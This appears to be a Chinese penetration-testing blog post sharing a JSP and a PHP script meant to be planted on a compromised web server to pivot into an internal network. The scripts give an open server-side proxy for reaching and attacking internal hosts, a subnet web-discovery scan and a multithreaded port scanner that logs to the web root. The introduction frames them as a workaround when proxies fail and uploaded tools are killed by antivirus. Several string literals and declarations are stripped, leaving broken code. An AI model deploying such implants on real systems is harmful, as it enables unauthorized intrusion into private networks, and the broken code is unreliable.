前言: 某些情况下,内网渗透时,代理出不来,工具传上去被杀,总之就是遇到各种问题。而最纠结的是,我已经知道内网哪台机器有洞了..(经验多的大神飘过,如果能解决某些内网渗透时遇到的坑的问题,求分享解决方法..)
功能: 代理访问虽然是个简单的功能,但是我觉得够用了。完全可以用来直接扫描内网其他web服务器的目录,尝试内网其其他登陆入口的弱口令,或者直接代理打struts或者其他漏洞。
web扫描: 其实我觉得叫web发现更加贴切;有了端口扫描为啥还要这个?(因为之前的代码不想动它了。)
端口扫描: 大家都懂。(此功能问题较多,我觉得如果能使用工具或者代理回来就尽量不使用此脚本进行扫描。)
<%
@page
import
=
"java.io.File"
%>
<%@ page language=
"java"
import
=
"java.util.*"
pageEncoding=
"UTF-8"
%>
<%@ page isThreadSafe=
"false"
%>
<%
@page
import
=
"java.net.*"
%>
<%
@page
import
=
"java.io.PrintWriter"
%>
<%
@page
import
=
"java.io.BufferedReader"
%>
<%
@page
import
=
"java.io.FileReader"
%>
<%
@page
import
=
"java.io.FileWriter"
%>
<%
@page
import
=
"java.io.OutputStreamWriter"
%>
<%
@page
import
=
"java.util.regex.Matcher"
%>
<%
@page
import
=
"java.io.IOException"
%>
<%
@page
import
=
"java.net.InetAddress"
%>
<%
@page
import
=
"java.util.regex.Pattern"
%>
<%
@page
import
=
"java.net.HttpURLConnection"
%>
<%
@page
import
=
"java.util.concurrent.LinkedBlockingQueue"
%>
<%!
// Servlet-instance state declared in the JSP <%! %> block. These fields are shared
// by every request to the page; isThreadSafe="false" above only serialises requests,
// it does not reset them between requests.
// NOTE(review): the page renderer stripped the generics and identifier from this
// first declaration; the commented-out `scanportlist.add(...)` further down suggests
// it was a list named scanportlist — confirm against the original file.
final static List new ArrayList
// Referer and Cookie values forwarded verbatim on proxied requests. They are
// overwritten from request parameters and keep their last value afterwards.
String referer = "";
String cookie = "";
// Charset used for POST bodies and for decoding responses; also set per request,
// and may become null when the request omits the "decode" parameter.
String decode = "utf-8";
// Worker-thread count for the web-discovery scan (overridden by the "thread" parameter).
int thread = 100;
//final static List
// Directory the port-scan results file is appended to (see saveScanReslt2).
String cpath = "";
// Open an HTTP GET connection.
/**
 * Prepares (without yet connecting) an HTTP GET to urlString.
 * The instance-level referer and cookie fields are forwarded as request headers,
 * "Accept-Encoding: gzip" is advertised even though getHtmlByInputStream never
 * inflates a compressed body, and connect/read timeouts are 3 s each.
 * Returns null on any exception, including a malformed URL; callers hand that
 * null straight to getHtmlContext, which then reports the string "null".
 * The User-Agent is a fixed, dated string identical on every request this page makes.
 */
HttpURLConnection getHTTPConn(String urlString) {
    try {
        java.net.URL url = new java.net.URL(urlString);
        java.net.HttpURLConnection conn = (java.net.HttpURLConnection) url.openConnection();
        conn.setRequestMethod("GET");
        conn.addRequestProperty("User-Agent", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon;)");
        conn.addRequestProperty("Accept-Encoding", "gzip");
        conn.addRequestProperty("referer", referer);
        conn.addRequestProperty("cookie", cookie);
        //conn.setInstanceFollowRedirects(false);
        conn.setConnectTimeout(3000);
        conn.setReadTimeout(3000);
        return conn;
    } catch (Exception e) {
        // Malformed URL or connection setup failure: the caller sees null.
        return null;
    }
}
/**
 * Sends postString as an application/x-www-form-urlencoded POST to urlString and
 * returns the response body decoded with the instance decode charset (50 s timeouts).
 * Unlike getHTTPConn, no User-Agent, Referer or Cookie headers are set here.
 * On any exception the error stream is read instead; if the failure occurred
 * before openConnection() succeeded (e.g. a malformed URL), http is still null and
 * the catch block itself throws NullPointerException out of the method.
 * A null decode (request without the "decode" parameter) also lands in the catch.
 */
String PostData(String urlString, String postString) {
    HttpURLConnection http = null;
    String response = null;
    try {
        java.net.URL url = new java.net.URL(urlString);
        http = (HttpURLConnection) url.openConnection();
        http.setDoInput(true);
        http.setDoOutput(true);
        http.setUseCaches(false);
        http.setConnectTimeout(50000);
        http.setReadTimeout(50000);
        http.setRequestMethod("POST");
        http.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
        http.connect();
        OutputStreamWriter osw = new OutputStreamWriter(http.getOutputStream(), decode);
        osw.write(postString);
        osw.flush();
        osw.close();
        response = getHtmlByInputStream(http.getInputStream(), decode);
    } catch (Exception e) {
        // Fallback to the error body; http may still be null here (see above).
        response = getHtmlByInputStream(http.getErrorStream(), decode);
    }
    return response;
}
// Instance field that nothing on this page reads or writes; every method and
// worker below declares its own local `conn`.
HttpURLConnection conn;
// Read page source from an input stream.
/**
 * Reads all of is as text in charset code and returns it with blank lines dropped
 * and line breaks normalised to "\n" — the result is therefore not byte-faithful
 * to the response. The stream is read as plain text: the gzip encoding requested
 * in getHTTPConn would not be decoded here.
 * A null stream or unsupported charset throws inside the try; only the message is
 * printed to stdout and the caller receives an empty string rather than an error.
 */
String getHtmlByInputStream(java.io.InputStream is, String code) {
    StringBuffer html = new StringBuffer();
    try {
        java.io.InputStreamReader isr = new java.io.InputStreamReader(is, code);
        java.io.BufferedReader br = new java.io.BufferedReader(isr);
        String temp;
        while ((temp = br.readLine()) != null) {
            // Whitespace-only lines are skipped.
            if (!temp.trim().equals("")) {
                html.append(temp).append("\n");
            }
        }
        br.close();
        isr.close();
    } catch (Exception e) {
        // Readers are not closed on this path.
        System.out.print(e.getMessage());
    }
    return html.toString();
}
// Fetch the HTML source of a prepared connection.
/**
 * Reads the response body of conn as text; decode overrides the default "utf-8"
 * when non-null. If reading the input stream fails (including conn == null, which
 * throws NullPointerException at conn.getInputStream()), the error stream is read
 * instead when isError is true. If that also fails, or isError is false, the
 * literal string "null" is returned — callers test for that string, not for a
 * null reference.
 */
String getHtmlContext(HttpURLConnection conn, String decode, boolean isError) {
    // NOTE(review): generics and identifier were stripped by the page renderer;
    // nothing visible on this page uses this map.
    Map new HashMap
    String code = "utf-8";
    if (decode != null) {
        code = decode;
    }
    try {
        return getHtmlByInputStream(conn.getInputStream(), code);
    } catch (Exception e) {
        try {
            if (isError) {
                return getHtmlByInputStream(conn.getErrorStream(), code);
            }
        } catch (Exception e1) {
            // Logs the outer exception's message (e), not e1's.
            System.out.println("getHtmlContext2:" + e.getMessage());
        }
        System.out.println("getHtmlContext:" + e.getMessage());
        return "null";
    }
}
// Read the Server response header.
/**
 * Returns the value of the "Server" response header, or the literal "null" when
 * conn is null or the lookup throws. A present connection without that header
 * yields a real null from getHeaderField, which callers then concatenate as "null".
 */
String getServerType(HttpURLConnection conn) {
    try {
        return conn.getHeaderField("Server");
    } catch (Exception e) {
        return "null";
    }
}
// Extract the page title.
/**
 * Concatenates every match of the title pattern found in htmlSource and strips
 * tags from the result with replaceAll("<.*?>", ""). Returns "" when nothing
 * matches, and null when htmlSource is null (the NullPointerException raised by
 * pa.matcher is swallowed).
 * NOTE(review): the page renderer stripped both the list declaration's generics
 * and the pattern literal (it contained markup). The final tag-stripping step
 * suggests the pattern matched the <title> element — confirm against the original.
 */
String getTitle(String htmlSource) {
    try {
        List new ArrayList
        String title = "";
        Pattern pa = Pattern.compile(
        "
        );
        Matcher ma = pa.matcher(htmlSource);
        while (ma.find()) {
            list.add(ma.group());
        }
        for (int i = 0; i < list.size(); i++) {
            title = title + list.get(i);
        }
        return title.replaceAll("<.*?>", "");
    } catch (Exception e) {
        return null;
    }
}
// Collect the stylesheets referenced by a page.
/**
 * NOTE(review): the page renderer stripped the method name, parameters and
 * generics from this definition, and the string literal that wrapped each fetched
 * stylesheet — only the tokens below survive. The log tag "getCss:" is the one
 * remaining hint of the name. From the body: every `href="...css` reference in the
 * lower-cased html is collected, resolved as url + "/" + reference, and one entry
 * per reference is added to the returned list. As shown, csshtml is always "" so
 * every entry is empty. Any exception is printed and the partial list returned.
 */
List
List new ArrayList
List new ArrayList
try {
    String title = "";
    // Greedy "(.*)" stretches to the last ".css" on a line, so several links on
    // one line collapse into a single (wrong) entry.
    Pattern pa = Pattern.compile(".*href=\"(.*)[.]css");
    Matcher ma = pa.matcher(html.toLowerCase());
    while (ma.find()) {
        cssurl.add(ma.group(1) + ".css");
    }
    for (int i = 0; i < cssurl.size(); i++) {
        String cssuuu = url + "/" + cssurl.get(i);
        // cssuuu is computed but, in the surviving text, never fetched.
        String csshtml = "";
        csscode.add(csshtml);
    }
} catch (Exception e) {
    System.out.println("getCss:" + e.getMessage());
}
return csscode;
}
// Resolve the local host name to an IP address.
/**
 * Returns the textual address that InetAddress.getLocalHost() resolves the
 * server's own host name to. It is called from the web-discovery branch, but
 * that branch immediately overwrites the value with the request's ip parameter,
 * so the result is never actually used.
 * @throws IOException (UnknownHostException) when the host name cannot be resolved
 */
String getMyIPLocal() throws IOException {
    InetAddress ia = InetAddress.getLocalHost();
    return ia.getHostAddress();
}
/**
 * Attempts a TCP connect to task, given as "host:port". On success the line
 * "task >>> Open\r\n" is appended to cpath/port.txt via saveScanReslt2 and the
 * task is echoed to stdout. Any failure — refused, unreachable, missing ":",
 * non-numeric port — is swallowed and reported as false.
 * The Socket constructor is used with no explicit timeout, so a filtered port can
 * hold the worker for the OS default connect timeout, and the opened socket is
 * never closed.
 */
boolean getHostPort(String task) {
    Socket client = null;
    boolean isOpen = false;
    try {
        String[] s = task.split(":");
        client = new Socket(s[0], Integer.parseInt(s[1]));
        isOpen = true;
        System.out.println("getHostPort:" + task);
        //scanportlist.add(task+" >>> Open");
        saveScanReslt2(task + " >>> Open\r\n");
    } catch (Exception e) {
        isOpen = false;
    }
    return isOpen;
}
/**
 * Records the directory used for the port.txt results file (see saveScanReslt2).
 * Despite the name it is a setter; the scriptlet passes application.getRealPath("/").
 */
void getPath(String path) {
    cpath = path;
}
/* void saveScanReslt(String s){
try{
FileUtils.writeStringToFile(new File(cpath+"/port.txt"), s,"UTF-8",true);
}catch(Exception e){
System.out.print(e.getLocalizedMessage());
}
} */
/**
 * Appends content to cpath + "/port.txt" with a FileWriter in append mode and the
 * platform default charset. Because cpath is the web application's real path, the
 * file sits in the web root, where the container will normally serve it to any
 * client that requests /port.txt — a durable, externally visible artifact of a scan.
 * IOExceptions are printed to stdout; the writer is closed in finally. Each worker
 * thread opens its own FileWriter on the same file, so lines may interleave.
 */
void saveScanReslt2(String content) {
    FileWriter writer = null;
    try {
        writer = new FileWriter(cpath + "/port.txt", true);
        writer.write(content);
    } catch (IOException e) {
        System.out.print(e.getLocalizedMessage());
    } finally {
        try {
            if (writer != null) {
                writer.close();
            }
        } catch (IOException e) {
            System.out.print(e.getLocalizedMessage());
        }
    }
}
// Accumulator used by readPortResult. It is a servlet-instance field rather than a
// local, so each call appends the file contents again and the displayed result
// grows with every page load. NOTE(review): the literal's tail (markup) was
// stripped by the page renderer.
String s=
"Result:
;
/**
 * Appends every line of portfile to the instance field s (each followed by a
 * separator literal the renderer stripped) and returns s. Since s is never reset,
 * the result includes everything accumulated by earlier calls.
 * Returns null when the file cannot be opened or read, which the scriptlet uses to
 * show the "no results yet" message. reader.close() runs both in the try and in
 * finally; a return inside finally would override the try's result.
 */
String readPortResult(String portfile) {
    File file = new File(portfile);
    BufferedReader reader = null;
    try {
        System.out.println("");
        reader = new BufferedReader(new FileReader(file));
        String tempString = null;
        while ((tempString = reader.readLine()) != null) {
            // NOTE(review): separator literal lost its closing quote/markup in rendering.
            s += tempString +
            "
            ;
        }
        reader.close();
    } catch (IOException e) {
        return null;
    } finally {
        if (reader != null) {
            try {
                reader.close();
            } catch (IOException e1) {
                return null;
            }
        }
    }
    return s;
}
%>
/**
 * Switches the visible panel: the element whose id equals obj ("proxy", "web"
 * or "port") is shown and the other two are hidden. Any other value is ignored.
 * @param {string} obj  id of the panel to reveal
 */
function showDiv(obj) {
    //var statu = document.getElementById("prequest").style.display;
    var panelIds = ["proxy", "web", "port"];
    var known = false;
    for (var k = 0; k < panelIds.length; k++) {
        if (obj == panelIds[k]) {
            known = true;
        }
    }
    if (!known) {
        return;
    }
    // Same write order as the original branches: proxy, then web, then port.
    for (var n = 0; n < panelIds.length; n++) {
        var id = panelIds[n];
        document.getElementById(id).style.display = (obj == id) ? "block" : "none";
    }
}
href=
"javascript:void(0);"
onclick=
"showDiv('port');"
style=
"margin-left: 32px;"
>端口扫描
<%
// Request dispatcher for the page. Exactly one of three modes runs, chosen by the
// first non-null parameter in this order:
//   url=     fetch that URL from the server (GET, or POST when "post" is also given)
//            and echo the body back with relative links rewritten to route through
//            /netspy.jsp?url= — an open server-side request forwarder, so every
//            request it makes originates from this host with the fixed User-Agent
//            set in getHTTPConn;
//   ip=      "web discovery": GET http://<first three octets of ip>.N:<port> for
//            N = 1..256 and each comma-separated "port", from `thread` worker
//            threads, printing title / Server header for every host that answers;
//   scanip=  TCP connect scan of the last-octet range scanip..scanip2 on the
//            comma-separated "scanport" list; results go to <webroot>/port.txt and
//            the response returns while the workers keep running.
// Artifacts a defender can look for: port.txt in the web root (also reachable over
// HTTP), a ThreadGroup named "c", every target echoed to the container's stdout,
// and in scanip mode worker threads that never terminate (see the note below).
final JspWriter pwx = out;
// Previous scan output is read back from the web root on every page load.
String s = application.getRealPath("/") + "/port.txt";
String result = readPortResult(s);
if (result != null) {
    try {
        pwx.println(result);
    } catch (Exception e) {
        System.out.print(e.getMessage());
    }
} else {
    // NOTE(review): the literal's trailing markup was stripped by the page renderer.
    pwx.println(
    "如果你进行了端口扫描操作,那么这里将会显示扫描结果!
    );
}
// NOTE(review): div1's markup literal was stripped; div2, used further down, has no
// surviving declaration on this page — presumably it sat in the same stripped span.
String div1 =
"
;
String u = request.getParameter("url");
String ip = request.getParameter("ip");
String scanip = request.getParameter("scanip");
if (u != null) {
    String post = request.getParameter("post");
    //System.out.print(u);
    //System.out.print(post);
    // These are servlet-instance fields: decode may become null here, and
    // referer/cookie keep their last value for subsequent requests.
    decode = request.getParameter("decode");
    String ref = request.getParameter("referer");
    String cook = request.getParameter("cookie");
    if (ref != null) {
        referer = ref;
    }
    if (cook != null) {
        cookie = cook;
    }
    String html = null;
    if (post != null) {
        html = PostData(u, post);
    } else {
        // isError=true: an HTTP error body is returned instead of the "null" marker.
        html = getHtmlContext(getHTTPConn(u), decode, true);
    }
    String path = request.getContextPath() + "/netspy.jsp";
    System.out.println("path:" + path);
    String basePath = request.getScheme() + "://" + request.getServerName() + ":" + request.getServerPort() + path + "?url=";
    System.out.println("base:" + basePath);
    String reaplce = "href=\"" + basePath;
    //html=html.replaceAll("href=['|\"]?http://(.*)['|\"]?", reaplce+"http://$1\"");
    // Rewrite links that do not start with "http" to go back through this page.
    // getHtmlContext returns the string "null" rather than a null reference on
    // failure, so replaceAll does not throw and the equals("null") test below is
    // the failure check.
    html = html.replaceAll("href=['|\"]?(?!http)(.*)['|\"]?", reaplce + u + "$1");
    // NOTE(review): declaration stripped by the renderer; the loop below reads
    // css.size()/css.get(i), so it presumably assigned getCss(u, html) to `css`.
    List
    String csshtml = "";
    if (!html.equals("null")) {
        for (int i = 0; i < css.size(); i++) {
            csshtml += css.get(i);
        }
        out.print(div1 + html + csshtml + div2);
    } else {
        response.setStatus(HttpServletResponse.SC_NOT_FOUND);
        out.print("请求失败!");
    }
    return;
} else if (ip != null) {
    String threadpp = (request.getParameter("thread"));
    // Throws NullPointerException (uncaught, HTTP 500) when "port" is absent.
    String[] port = request.getParameter("port").split(",");
    if (threadpp != null) {
        // Unbounded and unvalidated; a non-numeric value throws NumberFormatException here.
        thread = Integer.parseInt(threadpp);
        System.out.println(threadpp);
    }
    try {
        try {
            String http = "http://";
            // Always overwritten: this branch only runs when ip is non-null.
            String localIP = getMyIPLocal();
            if (ip != null) {
                localIP = ip;
            }
            String useIP = localIP.substring(0, localIP.lastIndexOf(".") + 1);
            // NOTE(review): generics/identifier stripped by the renderer; used as `queue` below.
            final Queue new LinkedBlockingQueue
            // The last octet runs 1..256 inclusive; 256 is not a valid octet, so the
            // final iteration enqueues unresolvable hosts for every port.
            for (int i = 1; i <= 256; i++) {
                for (int j = 0; j < port.length; j++) {
                    String url = http + useIP + i + ":" + port[j];
                    queue.offer(url);
                    System.out.print(url);
                }
            }
            final JspWriter pw = out;
            ThreadGroup tg = new ThreadGroup("c");
            for (int i = 0; i < thread; i++) {
                new Thread(tg, new Runnable() {
                    public void run() {
                        // Drains the shared queue and returns once it is empty.
                        while (true) {
                            String addr = queue.poll();
                            if (addr != null) {
                                System.out.println(addr);
                                HttpURLConnection conn = getHTTPConn(addr);
                                String html = getHtmlContext(conn, decode, false);
                                String title = getTitle(html);
                                String serverType = getServerType(conn);
                                String status = !html.equals("null") ? "Success" : "Fail";
                                if (html != null && !status.equals("Fail")) {
                                    try {
                                        // Workers write to the request's JspWriter concurrently.
                                        // NOTE(review): trailing literal stripped by the renderer.
                                        pw.println(addr + " >> " + title + ">>" + serverType + " >>" + status +
                                        "
                                        );
                                    } catch (Exception e) {
                                        e.printStackTrace();
                                    }
                                }
                            } else {
                                return;
                            }
                        }
                    }
                }).start();
            }
            // Busy-wait on the request thread (full CPU) until every worker has returned.
            while (tg.activeCount() != 0) {
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
    } catch (Exception e) {
        out.println(e.toString());
    }
} else if (scanip != null) {
    // The results file is placed under the web application's real path.
    getPath(application.getRealPath("/"));
    // Shadows the instance field `thread`. parseInt on a missing or non-numeric
    // parameter throws uncaught, as do the substring/parseInt calls on scanip2 below.
    int thread = Integer.parseInt(request.getParameter("thread"));
    String[] port = request.getParameter("scanport").split(",");
    String ip1 = scanip;
    String ip2 = request.getParameter("scanip2");
    // Only the last octet of each address is parsed; the first three come from scanip.
    int start = Integer.parseInt(ip1.substring(ip1.lastIndexOf(".") + 1, ip1.length()));
    int end = Integer.parseInt(ip2.substring(ip2.lastIndexOf(".") + 1, ip2.length()));
    String useIp = scanip.substring(0, scanip.lastIndexOf(".") + 1);
    System.out.println("start:" + start);
    System.out.println("end:" + end);
    // NOTE(review): generics/identifier stripped by the renderer; used as `queue` below.
    final Queue new LinkedBlockingQueue
    for (int i = start; i <= end; i++) {
        for (int j = 0; j < port.length; j++) {
            String scantarget = useIp + i + ":" + port[j];
            queue.offer(scantarget);
            //System.out.println(scantarget);
        }
    }
    System.out.print("Count1:" + queue.size());
    final JspWriter pw = out;
    ThreadGroup tg = new ThreadGroup("c");
    for (int i = 0; i < thread; i++) {
        new Thread(tg, new Runnable() {
            public void run() {
                // Unlike the ip-mode worker above there is no return when poll()
                // yields null: each thread spins at full CPU forever once the queue
                // drains, and the threads accumulate with every scan request.
                while (true) {
                    String scantask = queue.poll();
                    if (scantask != null) {
                        getHostPort(scantask);
                        /* String result = null;
                        if(isOpen){
                        result=scantask+ " >>> Open
                        scanportlist.add(result);
                        System.out.println(result);
                        } */
                        /* try {
                        pw.println(result);
                        } catch (Exception e) {
                        System.out.print(e.getMessage());
                        } */
                    }
                }
            }
        }).start();
    }
    /* while (tg.activeCount() != 0) {
    } */
    // pw is captured by the workers but never written by them; the response is
    // sent immediately while the scan continues in the background.
    try {
        pw.println("扫描线程已经开始,请查看" + cpath + "/port.txt文件或者直接刷新本页面!");
    } catch (Exception e) {
        System.out.print(e.getMessage());
    }
}
%>
前些天看到wooyun社区有人发的jsp内网探测脚本,可以内网代理访问和内网端口扫描。但是却没找到php的既能代理内网,又能扫描内网端口的脚本。所以我写了这个集合版本的php内网探测脚本。
// NOTE(review): the opening <?php tag did not survive the page renderer.
// Lift the execution-time limit so a long scan is not cut off by max_execution_time.
set_time_limit(0);
// Stream output as it is produced: implicit flush on, and discard any existing buffer.
ob_implicit_flush(True);
ob_end_flush();
// Target for proxy mode, accepted from GET, POST or cookie alike ($_REQUEST), unvalidated.
$url = isset($_REQUEST['url'])? $_REQUEST['url']:null;
/* Port-scan code */
/**
 * Attempts a TCP connect to $ip:$port with fsockopen (warnings suppressed) and
 * returns true when the connection opened; the socket is closed again at once.
 * On failure nothing is returned (NULL rather than false); the caller compares
 * against True so both count as closed. $timeout defaults to 0.1 s.
 */
function check_port($ip, $port, $timeout = 0.1) {
    $conn = @fsockopen($ip, $port, $errno, $errstr, $timeout);
    if ($conn) {
        fclose($conn);
        return true;
    }
}
/**
 * Probes every entry of $portarr on $ip and echoes "Port: N is open" for each
 * open one, flushing after every hit so the browser sees progress.
 * Note the call `check_port($ip, $port, $timeout=0.1)`: the third argument is an
 * assignment expression, so the $timeout passed into scanip is discarded and every
 * probe uses 0.1 s regardless of the timeout field submitted with the form.
 */
function scanip($ip, $timeout, $portarr){
    foreach ($portarr as $port){
        if (check_port($ip, $port, $timeout=0.1)==True){
            // NOTE(review): the trailing markup of this literal was stripped by the renderer.
            echo 'Port: ' . $port . ' is open
            ;
            @ob_flush();
            @flush();
        }
    }
}
// NOTE(review): this echo originally emitted the scan form; the renderer stripped
// the markup and only the "Timeout" label of the literal survives.
echo '
Timeout
';
// Scan mode: runs only when all four form fields are posted. Inputs are used as
// given; the only validation is the octet-count / first-two-octet check below.
if (isset($_POST['startip'])&&isset($_POST['endip'])&&isset($_POST['port'])&&isset($_POST['timeout'])){
    $startip = $_POST['startip'];
    $endip = $_POST['endip'];
    // Forwarded to scanip(), which ignores it (see the note there).
    $timeout = $_POST['timeout'];
    $port = $_POST['port'];
    $portarr = explode(',', $port);
    $siparr = explode('.', $startip);
    $eiparr = explode('.', $endip);
    // $ciparr walks from the start address towards the end address.
    $ciparr = $siparr;
    // Refuses anything that is not four octets or that differs in the first two
    // octets (i.e. a range wider than a /16). Nothing checks that $startip <= $endip.
    if (count($ciparr)!=4||$siparr[0]!=$eiparr[0]||$siparr[1]!=$eiparr[1]){
        exit('IP error: Wrong IP address or Trying to scan class A address');
    }
    if ($startip == $endip){
        // NOTE(review): trailing markup of this literal stripped by the renderer.
        echo 'Scanning IP ' . $startip . '
        ;
        @ob_flush();
        @flush();
        scanip($startip, $timeout, $portarr);
        @ob_flush();
        @flush();
        exit();
    }
    // Make the end exclusive by bumping the last octet — except at 255, so an end
    // address ending in .255 is itself never scanned.
    if ($eiparr[3]!=255){
        $eiparr[3]+=1;
    }
    // Loose array comparison; after +=1 the octets mix ints and strings, which
    // still compare equal. If the start is above the end the arrays never match
    // and, with set_time_limit(0), this loop runs until the process is killed.
    while ($ciparr != $eiparr){
        $ip = $ciparr[0].'.'.$ciparr[1].'.'.$ciparr[2].'.'.$ciparr[3];
        // NOTE(review): markup around $ip in this literal was stripped by the renderer.
        echo '
        .$ip.'
        ;
        @ob_flush();
        @flush();
        scanip($ip, $timeout, $portarr);
        // Manual carry across the third and second octets.
        $ciparr[3]+=1;
        if ($ciparr[3]>255){
            $ciparr[2]+=1;
            $ciparr[3]=0;
        }
        if ($ciparr[2]>255){
            $ciparr[1]+=1;
            $ciparr[2]=0;
        }
    }
}
/* Intranet proxy code */
/**
 * Fetches $url with cURL (response headers + body, 120 s timeout) and returns the
 * body on HTTP 200. On 302 it follows the Location header recursively — prefixing
 * getHost($url) when the header is judged relative — with no hop limit, so a
 * redirect loop recurses until PHP runs out of stack or time. Any other status
 * returns NULL. The cURL handle is never closed.
 * Side effect: the response header lines are stored in the global $header, which
 * getHeader() reads; getHeader() itself is not defined anywhere on this page.
 * Note the loose `strpos(...) == false` test: a Location that starts with
 * "http://" gives strpos 0, which == false, so absolute redirects are also
 * treated as relative and get the host prefixed.
 */
function getHtmlContext($url){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, TRUE);
    // Response headers are wanted
    curl_setopt($ch, CURLOPT_NOBODY, FALSE);
    // Response body is wanted
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
    curl_setopt($ch, CURLOPT_TIMEOUT, 120);
    $result = curl_exec($ch);
    global $header;
    if ($result){
        $headerSize = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
        $header = explode("\r\n", substr($result, 0, $headerSize));
        $body = substr($result, $headerSize);
    }
    if (curl_getinfo($ch, CURLINFO_HTTP_CODE) == '200') {
        return $body;
    }
    if (curl_getinfo($ch, CURLINFO_HTTP_CODE) == '302') {
        $location = getHeader("Location");
        if (strpos(getHeader("Location"), 'http://') == false){
            $location = getHost($url).$location;
        }
        return getHtmlContext($location);
    }
    return NULL;
}
/**
 * Returns the leading "http://" (when present) plus the host[:port] part of $url,
 * i.e. everything up to the first "/". Matching is case-insensitive and the whole
 * match is returned, so "https://x/y" yields just "https:" because the optional
 * group only knows "http://". As in the original, an input with nothing before its
 * first "/" leaves $parts empty, and reading [0] raises a notice and returns NULL.
 */
function getHost($url){
    $prefixPattern = "/^(http:\/\/)?([^\/]+)/i";
    preg_match($prefixPattern, $url, $parts);
    $prefix = $parts[0];
    return $prefix;
}
/**
 * Finds stylesheet references in $html — the pattern's body was stripped by the
 * page renderer and only "//i" survives; $matches[1] is read, so it had one
 * capture group — resolves each relative reference as $host . "/" . $v, and
 * appends $csshtml to $html once per reference. In the surviving text $csshtml is
 * always "" (its markup literal was stripped), so $html is returned unchanged.
 * Same loose `strpos() == false` test as getHtmlContext: a reference that starts
 * with "http://" is also treated as relative.
 */
function getCss($host, $html){
    preg_match_all("//i", $html, $matches);
    foreach ($matches[1] as $v){
        $cssurl = $v;
        if (strpos($v, 'http://') == false){
            $cssurl = $host . "/" . $v;
        }
        // $cssurl is computed but, as shown, never fetched.
        $csshtml = "";
        $html .= $csshtml;
    }
    return $html;
}
// Proxy mode: when a url parameter is present, fetch it server-side and echo the
// body with stylesheets inlined. The `!= null` test is loose, so `url=` with an
// empty value passes isset() above but is skipped here.
if ($url != null){
    $host = getHost($url);
    echo getCss($host,getHtmlContext($url));
}
?>
用法:
1、端口扫描部分:
填好起始ip、结束ip、自定义端口、超时等,点击扫描即可,十分方便
2、内网代理部分:
直接在文件后面加url参数,注意这里要带上http协议,不然css可能加载不全
from
http://jeary.org/post-69.html
http://www.answ.cc/?post=18